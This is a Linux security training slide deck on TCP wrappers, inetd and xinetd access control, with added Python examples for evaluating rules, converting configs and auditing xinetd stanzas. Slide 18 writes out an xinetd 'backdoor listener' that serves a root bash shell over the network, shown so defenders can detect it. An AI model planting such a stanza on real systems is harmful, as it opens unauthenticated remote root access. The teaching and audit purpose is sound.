Slide 1: TCP Wrapper

Provides host-based access control to network services. It has the following features:
- Logging
- Access Control
- Host Name Verification
- User Name Verification
- Spoofing Protection

Notes: The TCP wrappers package (tcp_wrappers) is typically installed by default on current distributions and provides host-based access control to network services. It has the following features:
- Logging - Connections that are monitored by the TCP wrappers daemon (tcpd) are reported through the syslog facility.
- Access Control - tcpd supports a simple form of access control that is based on pattern matching. You can also hook the execution of shell commands and scripts when a pattern matches an IP address/mask.
- Host Name Verification - tcpd verifies the client
Slide 2: TCP Wrapper

Has the following advantages over other network service control techniques:
- Transparency to both the client host and the wrapped network service - Both the connecting client and the wrapped network service are unaware that TCP wrappers are in use. Allowed users are connected to the requested service while connections from disallowed clients fail.
- Centralized management of multiple protocols - TCP wrappers operate separately from the network services they protect, allowing many server applications to share a common set of configuration files for simpler management.
Slide 3: TCP Wrapper Advantages

TCP wrappers provide the following advantages over other network service control techniques:
- Transparency - both the connecting client and the wrapped network service are unaware that TCP wrappers are in use.
- Centralized management - TCP wrappers operate separately from the network services they protect, allowing many server applications to share a common set of configuration files for simpler management.

Notes: TCP wrappers provide the following advantages over other network service control techniques:
- Transparency to both the client host and the wrapped network service - Both the connecting client and the wrapped network service are unaware that TCP wrappers are in use. Legitimate users are logged and connected to the requested service while connections from banned clients fail.
- Centralized management of multiple protocols - TCP wrappers operate separately from the network services they protect, allowing many server applications to share a common set of configuration files for simpler management.
Slide 4: TCP Wrapper Disadvantages

- Services must be compiled with the libwrap library
- Only works with a super-daemon such as inetd or xinetd
- Ident service not reliable
- Doesn't wrap RPC services
- TCP Wrappers is not a firewall replacement

Notes: Disadvantages:
- Services must be compiled with the libwrap library.
- Only works in conjunction with a super-daemon such as inetd or xinetd.
- Ident service not reliable - It is nearly impossible for the administrators of the remote service to know whether specific users are connecting via a trustable server or from a computer they themselves control. In the latter case the ident service provides no reliable information.
- Doesn't wrap RPC services.
Slide 5: TCP Wrapper Files

- tcpd - TCP wrappers daemon
- tcpdchk and tcpdmatch - test programs for tcpd
- /etc/hosts.allow - names of the hosts allowed
- /etc/hosts.deny - names of the hosts NOT allowed

Note: If the same client/user/IP is listed in both hosts.allow and hosts.deny, then hosts.allow takes precedence and access is permitted. If the client is listed in hosts.allow, then access is permitted. If the client is listed in hosts.deny, then access is denied. If no rules for the service are found in either file, or if neither file exists, access to the service is granted.

Notes: Advantages:
- Logs and applies access controls to remote connections
- Lets you define which daemons are wrapped
- Performs reverse lookup on host IPs
Disadvantages:
- Ident service not reliable
- Only looks at network daemons spawned by inetd (xinetd has its own way of performing this function)
- Doesn't wrap ALL services (RPC)
- Could give a false sense of security
tcpdchk and tcpdmatch - test programs for tcpd
Slide 6: TCP Wrapper Services

In order to gain the benefit of TCP wrappers, the service must be compiled with TCP wrappers (libwrap) support. For example, to determine if sshd is compiled with TCP wrappers support, type the command:

    ldd /usr/sbin/sshd | grep libwrap
    libwrap.so.0 => /lib64/libwrap.so.0 (0x0..

If not supported, rebuild the program with the option to support it.

Notes: In order to gain the benefit of TCP wrappers, the service must be compiled with TCP wrappers support. To determine if the service you wish to protect with TCP wrappers is built with TCP wrappers support, use the command ldd, which prints shared library dependencies. For example, to determine if sshd is compiled with TCP wrappers support, type the command:

    ldd /usr/sbin/sshd
    linux-vdso.so.1 => (0x00007fff54dfe000)
    libfipscheck.so.1 =>
Slide 7: TCP Wrapper Operation

- tcpd intercepts the connection request
- tcpd evaluates the connection attributes against hosts.allow/hosts.deny
- If allowed, tcpd releases control of the connection to the requested service
- If denied, tcpd does not release control of the connection

Notes: When a connection attempt is made to a TCP wrapped service, the tcpd service first references the hosts access files (/etc/hosts.allow and /etc/hosts.deny) to determine if the client host is allowed to connect. If configured, and it should be, the name of the requesting host and the requested service is written using syslog. If a client host is allowed to connect, TCP wrappers release control of the connection to the requested service and do not interfere further with communication between the client host
Slide 8: TCP Wrapper Configuration

/etc/hosts.allow and /etc/hosts.deny use the format:

    daemon_list : client_list [ : option : option : ... ]

(A trailing backslash continues a long rule onto the next line.) Where:
- daemon_list - a list of one or more daemons
- client_list - a list of one or more hosts
- option - optional action list

Notes: Both /etc/hosts.allow and /etc/hosts.deny use the following format:

    daemon_list : client_list [ : option : option : ... ]

Where:
- daemon_list - a list of one or more daemon process names.
- client_list - a list of one or more host names, host addresses, patterns or wildcards that will be matched against the client host name or address.
- option - optional action or
Slide 9: TCP Wrapper Wildcards

The access control language supports explicit wildcards:
- ALL - The universal wildcard, always matches
- LOCAL - Matches any host whose name does not contain a dot
- UNKNOWN - Matches any unknown name/address
- KNOWN - Matches any known name/address
- PARANOID - Matches any host whose name does not match its address

Notes: Wildcards - the access control language supports explicit wildcards:
- ALL - The universal wildcard, always matches.
- LOCAL - Matches any host whose name does not contain a dot character.
- UNKNOWN - Matches any user whose name is unknown, and matches any host whose name or address are unknown. This pattern should be used with care: host names may be unavailable due to temporary name server problems. A network address will be unavailable when the software cannot figure
Slide 10: TCP Wrapper Examples

Set the default policy to deny all access (/etc/hosts.deny):

    ALL: ALL

Explicitly permit authorized hosts (/etc/hosts.allow):

    popd : 192.168.1.200 192.168.1.104
    imapd : 192.168.1.0/255.255.255.0
    sendmail : 192.168.1.0/255.255.255.0
    sshd : .xyz.com

Notes: TCPD configuration examples. Set the default policy to deny all access. Edit the file /etc/hosts.deny as follows:

    ALL: ALL

Once the default deny policy is applied, you have to explicitly permit authorized hosts by adding them to /etc/hosts.allow:

    popd : 192.168.1.200 192.168.1.104
    imapd : 192.168.1.0/255.255.255.0
    sendmail : 192.168.1.0/255.255.255.0
Slide 11: TCP Wrapper twist Option

To send a message back to the source of the attempted connection after it is dropped, append the following to /etc/hosts.allow:

    ALL : .notallowed.com \
        : severity auth.info \
        : twist /bin/echo "Not allowed %d %h."

The message "Not allowed to use daemon from hostname." (with %d expanded to the daemon name and %h to the client hostname) will be returned to clients in .notallowed.com for any daemon not matched by an earlier entry in the access file. This sends a message back to the source of the attempted connection after it is dropped.

Notes: Suppose that a situation occurs where a connection should be denied and a reason should be sent to the source of the attempted connection. That action is possible with twist. When a connection attempt is made, twist executes a shell command or script and sends its output to the source of the attempted connection. For example, append the following to /etc/hosts.allow:

    ALL : .notallowed.com \
        : severity auth.info \
        : twist /bin/echo "You are not welcome to use %d from %h."

In this example, the message You are
Slide 12: TCP Wrapper spawn Option

Another possibility is to use spawn, which runs commands on the local system and sends no message to the source of the attempted connection. For example:

    ALL : .malware.com \
        : spawn (/bin/echo %a from %h \
          attempted to access %d >> \
          /var/log/connections.log) \
        : deny

This will deny all connection attempts from *.malware.com and log the hostname, IP address, and the accessed daemon to /var/log/connections.log.

Notes: Another possibility is to use spawn, which runs commands on the local system and sends no message to the source of the attempted connection. For example, the following:

    ALL : .malware.com \
        : spawn (/bin/echo %a from %h attempted to access %d >> \
          /var/log/connections.log) \
        : deny

This will deny all connection attempts from *.malware.com and log the hostname, IP address, and the daemon to which access was attempted to
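The precedence rule on slide 5, the rule format on slide 8, the wildcards on slide 9 and the twist/spawn options on slides 11 and 12 all come together in one evaluation. The following is an added example, not tcpd's own code: a small evaluator that reads hosts.allow/hosts.deny text (backslash continuations included) and returns the verdict for one (daemon, client) pair. It takes the client's address and already-resolved name as inputs instead of doing DNS, so PARANOID and EXCEPT are not modelled; the sample files are constructed from the slides' rules with placeholder domains.

```python
"""Toy evaluator for tcpd-style /etc/hosts.allow and /etc/hosts.deny rules.
Added example for this page; it is not tcpd's own code."""
import ipaddress

def parse_rules(text):
    """Return (daemon_list, client_list, options) triples, joining '\\' continuations."""
    rules = []
    for line in text.replace("\\\n", " ").splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = [f.strip() for f in line.split(":")]
        rules.append((fields[0].split(), fields[1].split(), fields[2:]))
    return rules

def client_matches(pattern, addr, name):
    """name is None when the reverse lookup failed, i.e. an UNKNOWN client."""
    if pattern == "ALL":
        return True
    if pattern == "LOCAL":
        return name is not None and "." not in name
    if pattern in ("KNOWN", "UNKNOWN"):
        return (name is not None) == (pattern == "KNOWN")
    if pattern.startswith("."):            # domain suffix such as .xyz.com
        return name is not None and name.endswith(pattern)
    if pattern.endswith("."):              # address prefix such as 192.168.1.
        return addr.startswith(pattern)
    if "/" in pattern:                     # net/mask such as 192.168.1.0/255.255.255.0
        return ipaddress.ip_address(addr) in ipaddress.ip_network(pattern, strict=False)
    return pattern in (addr, name)         # literal address or host name

def rule_matches(rule, daemon, addr, name):
    daemons, clients, _ = rule
    return (daemon in daemons or "ALL" in daemons) and any(
        client_matches(p, addr, name) for p in clients)

def decide(daemon, addr, name, allow_text, deny_text):
    """Return 'allow', 'deny' or 'twist' for one connection attempt: hosts.allow is
    searched first, then hosts.deny, first match wins, no match means access granted.
    An explicit allow/deny/twist option overrides the verdict implied by the file."""
    tagged = [(r, "allow") for r in parse_rules(allow_text)]
    tagged += [(r, "deny") for r in parse_rules(deny_text)]
    for rule, default in tagged:
        if rule_matches(rule, daemon, addr, name):
            for opt in rule[2]:
                word = opt.split()[0] if opt else ""
                if word in ("allow", "deny", "twist"):
                    return word
            return default
    return "allow"

# Constructed sample files mirroring the slides (domain names are placeholders).
HOSTS_DENY = "ALL: ALL\n"
HOSTS_ALLOW = """\
popd : 192.168.1.200 192.168.1.104
imapd : 192.168.1.0/255.255.255.0
sshd : .xyz.com
ALL : .notallowed.com \\
    : severity auth.info \\
    : twist /bin/echo "Not allowed %d %h."
ALL : .malware.com \\
    : spawn (/bin/echo %a from %h attempted to access %d >> /var/log/connections.log) \\
    : deny
"""
```

Running decide("sshd", "10.0.0.2", "box.notallowed.com", HOSTS_ALLOW, HOSTS_DENY) returns "twist", while a client that matches nothing in hosts.allow falls through to the ALL: ALL line in hosts.deny.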
Slide 13: Network Super Server

- Listens for network connections on behalf of another program
- Hands off control of that connection to the intended server
- Helps reduce memory load and improve security

There are two different super servers:
- inetd uses TCP Wrappers to handle security
- xinetd has built-in security features

Servers that normally use a super server: telnet, FTP, TFTP, rlogin, finger, POP, IMAP

Notes: Unix super servers:
- Listen for network connections on behalf of another program
- Hand off control of that connection to the intended server
- Help reduce memory load and improve security
There are two different super servers:
- inetd uses TCP Wrappers to handle security
- xinetd has built-in security features
Slide 14: inetd Configuration

Each line of the configuration has the form:

    service socket protocol {wait|nowait} user server parms

- service - name of the service from /etc/services
- socket - can be stream, dgram or raw
- protocol - can be tcp or udp
- wait/nowait - wait for dgram and nowait for other types
- user - username used to run the server
- server - server binary file, usually /usr/sbin/tcpd
- parms - parameters that are passed to the server

Example:

    ftp stream tcp nowait root /usr/sbin/tcpd /usr/sbin/in.ftpd

Notes: inetd has been superseded by xinetd, so it is recommended to replace it with xinetd. You may run into existing systems using inetd, so it is good to know how to read the configuration so you can convert from inetd format to xinetd. Main configuration file: /etc/inetd.conf. Other configuration files are typically in /etc/inetd.d/.
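The notes above recommend knowing how to convert an inetd entry to xinetd format. Here is an added example, not inetd's or xinetd's own code, that does that conversion for the seven-field layout on the slide: it maps wait/nowait to xinetd's wait = yes/no and, when the server is /usr/sbin/tcpd, drops the tcpd hop and uses the wrapped program as the server (xinetd applies its own only_from/no_access controls). The inetd 'user.group' and rate-limit forms are assumed absent.

```python
"""Convert one /etc/inetd.conf line into an xinetd service stanza.
Added example for this page, not inetd's or xinetd's own code."""


def parse_inetd_line(line):
    """Split an inetd.conf line into named fields (parms may be empty)."""
    fields = line.split(None, 6)
    if len(fields) < 6:
        raise ValueError("inetd line needs at least 6 fields: %r" % line)
    service, socket, protocol, wait, user, server = fields[:6]
    parms = fields[6].split() if len(fields) == 7 else []
    if wait not in ("wait", "nowait"):
        raise ValueError("wait field must be 'wait' or 'nowait': %r" % wait)
    # A tcpd-wrapped entry names the real server as the first parameter;
    # xinetd enforces its own access controls, so the tcpd hop is dropped.
    if server.endswith("/tcpd") and parms:
        server, parms = parms[0], parms[1:]
    return {"service": service, "socket_type": socket, "protocol": protocol,
            "wait": "yes" if wait == "wait" else "no", "user": user,
            "server": server, "server_args": " ".join(parms)}


def to_xinetd(entry):
    """Render a parsed entry as the contents of /etc/xinetd.d/<service>."""
    keys = ["socket_type", "protocol", "wait", "user", "server"]
    if entry["server_args"]:
        keys.append("server_args")
    body = "".join("    %-12s= %s\n" % (k, entry[k]) for k in keys)
    return "service %s\n{\n%s    disable     = no\n}\n" % (entry["service"], body)


# Constructed sample line, copied from the slide's inetd example.
INETD_FTP = "ftp stream tcp nowait root /usr/sbin/tcpd /usr/sbin/in.ftpd"

if __name__ == "__main__":
    print(to_xinetd(parse_inetd_line(INETD_FTP)))
```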
Slide 15: xinetd Configuration

    service ftp
    {
        socket_type = stream
        protocol    = tcp
        wait        = no
        user        = ftp
        server      = /usr/sbin/in.ftpd
        server_args = -i
        disable     = no
    }

Disable a service: change disable to yes.

To restart the xinetd service:

    /etc/init.d/xinetd {restart|reload}

Notes: Configuration file: /etc/xinetd.conf. Files in /etc/xinetd.d/ are included. Each server run via xinetd installs a file in /etc/xinetd.d. Syntax of /etc/xinetd.conf, example: service ftp
Slide 16: xinetd Security Enhancements

- Listen on only one network interface for the service: bind = <IP Address>
- Accept connections only from IP addresses: only_from = <IP Addresses | Network>
- Deny connections from IP addresses: no_access = <IP Addresses | Network>
- Set times during which users may access the server: access_times = hour:min-hour:min
- If access is prohibited, send a banner to the client: banner = /usr/local/etc/deny_banner (xinetd also provides banner_fail, which is shown only when access is refused)

Notes: Using the following options in /etc/xinetd.conf:
- Listen on only one network interface for the service: bind = <IP Address>
- Accept connections only from IP addresses (similar to TCP Wrapper's hosts.allow): only_from = <IP Addresses | Network>
- Deny connections from IP addresses (similar to TCP Wrapper's hosts.deny):
Slide 17: To Run or Not to Run xinetd

To run:
- Conserves resources
- Runs daemons only when needed
- Provides an additional layer of security
- Can turn virtually any script or program into a service

Not to run:
- Another vulnerable service
- Can secure services using other methods
- Can be used to create a backdoor listener

Notes: Reasons to run xinetd: xinetd conserves resources, runs daemons only when needed, provides an additional layer of security and can "box" a service into a directory with "change root" (chroot), and it can turn virtually any script or program into a service (this can be bad, see next). Reasons not to run xinetd: Like any additional service, it has suffered from vulnerabilities. Although, there are currently no known
Slide 18: xinetd Backdoor Listener

    service kazaa
    {
        disable     = no
        protocol    = tcp
        socket_type = stream
        wait        = no
        user        = root
        server      = /bin/bash
        server_args = -i
    }

xinetd reads this file and determines the port from /etc/services.

Notes: Here is an example of an xinetd backdoor listener. Create a file in /etc/xinetd.d/kazaa:

    service kazaa
    {
        disable     = no
        protocol    = tcp
        socket_type = stream
        wait        = no
        user        = root
        server      = /bin/bash
        server_args = -i
    }
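The stanza above is what a defender should be looking for in /etc/xinetd.d. The following is an added example, not part of xinetd: a small audit routine that parses 'service name { key = value }' stanzas and flags enabled services whose server is a shell interpreter, or that run as root with none of the only_from/no_access restrictions from slide 16. The sample text is constructed from the slide's backdoor beside a restricted ftp entry.

```python
"""Audit xinetd service stanzas for the backdoor pattern shown on the slide.
Added example for this page, not part of xinetd."""
import re

SHELL_NAMES = {"sh", "bash", "dash", "zsh", "ksh"}
STANZA = re.compile(r"service\s+(\S+)\s*\{(.*?)\}", re.S)
ATTR = re.compile(r"^\s*(\w+)\s*(\+=|-=|=)\s*(.*?)\s*$")

def parse_xinetd(text):
    """Return {service_name: {attribute: value}} for every stanza in text."""
    services = {}
    for name, body in STANZA.findall(text):
        attrs = {}
        for line in body.splitlines():
            m = ATTR.match(line.split("#", 1)[0])   # drop trailing comments
            if m:
                attrs[m.group(1)] = m.group(3)
        services[name] = attrs
    return services

def audit(text):
    """Return (service, finding) pairs; an empty list means nothing suspicious."""
    findings = []
    for name, a in parse_xinetd(text).items():
        if a.get("disable", "no").lower() == "yes":
            continue                                 # disabled services never listen
        server = a.get("server", "")
        if server.rsplit("/", 1)[-1] in SHELL_NAMES:
            findings.append((name, "server is a shell interpreter: " + server))
        if a.get("user") == "root" and not (a.get("only_from") or a.get("no_access")):
            findings.append((name, "runs as root with no only_from/no_access restriction"))
    return findings

# Constructed sample: the slide's backdoor listener beside a restricted ftp service.
SAMPLE = """
service kazaa
{
    disable     = no
    protocol    = tcp
    socket_type = stream
    wait        = no
    user        = root
    server      = /bin/bash
    server_args = -i
}

service ftp
{
    socket_type = stream
    protocol    = tcp
    wait        = no
    user        = ftp
    server      = /usr/sbin/in.ftpd
    only_from   = 192.168.1.0/24
    disable     = no
}
"""

if __name__ == "__main__":
    for service, finding in audit(SAMPLE):
        print("%s: %s" % (service, finding))
```

On a live system, read every file under /etc/xinetd.d plus /etc/xinetd.conf and pass the concatenated text to audit().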
Slide 19: Evaluation Order

(Flow chart) Firewall -> Allowed -> TCP Wrappers -> Allowed -> xinetd -> Allowed -> network service (a TCP wrapped network service or an xinetd controlled network service). A connection rejected at any stage goes no further.

Notes: The firewall, TCP wrappers, and xinetd function independently of each other and each provide a layer of protection. When troubleshooting connectivity problems when using these services together, follow the chart and watch the logs to find the service responsible.
Slide 20: Disable Services/Interfaces

- Disable DHCP, configure a static IP
- Disable or remove unused protocols such as IPv6
- Disable wireless networking (including Bluetooth)
- Disable/remove clear text protocols and use their secure replacements

Notes: Network interfaces and protocols: Most distributions use DHCP by default. For enhanced security, configure a static IP address. This ensures the system maintains the same address at all times, so that any external system such as a firewall or IDS keeps protecting this system under its static IP address. Another solution would be to use a reservation in DHCP. Disable unused protocols such as IPv6. This prevents attackers from using protocols that you may not be monitoring. Wireless networking presents a risk of information leakage. The best solution is to remove the wireless hardware, but if that is not feasible, then the drivers can be removed. Although Bluetooth supposedly has a limited range, there are proof-of-concept interceptions of Bluetooth signals from a fairly large distance. It may also be possible to disable wireless in the BIOS. Disable/remove all clear text protocols. Use other options such as SSH.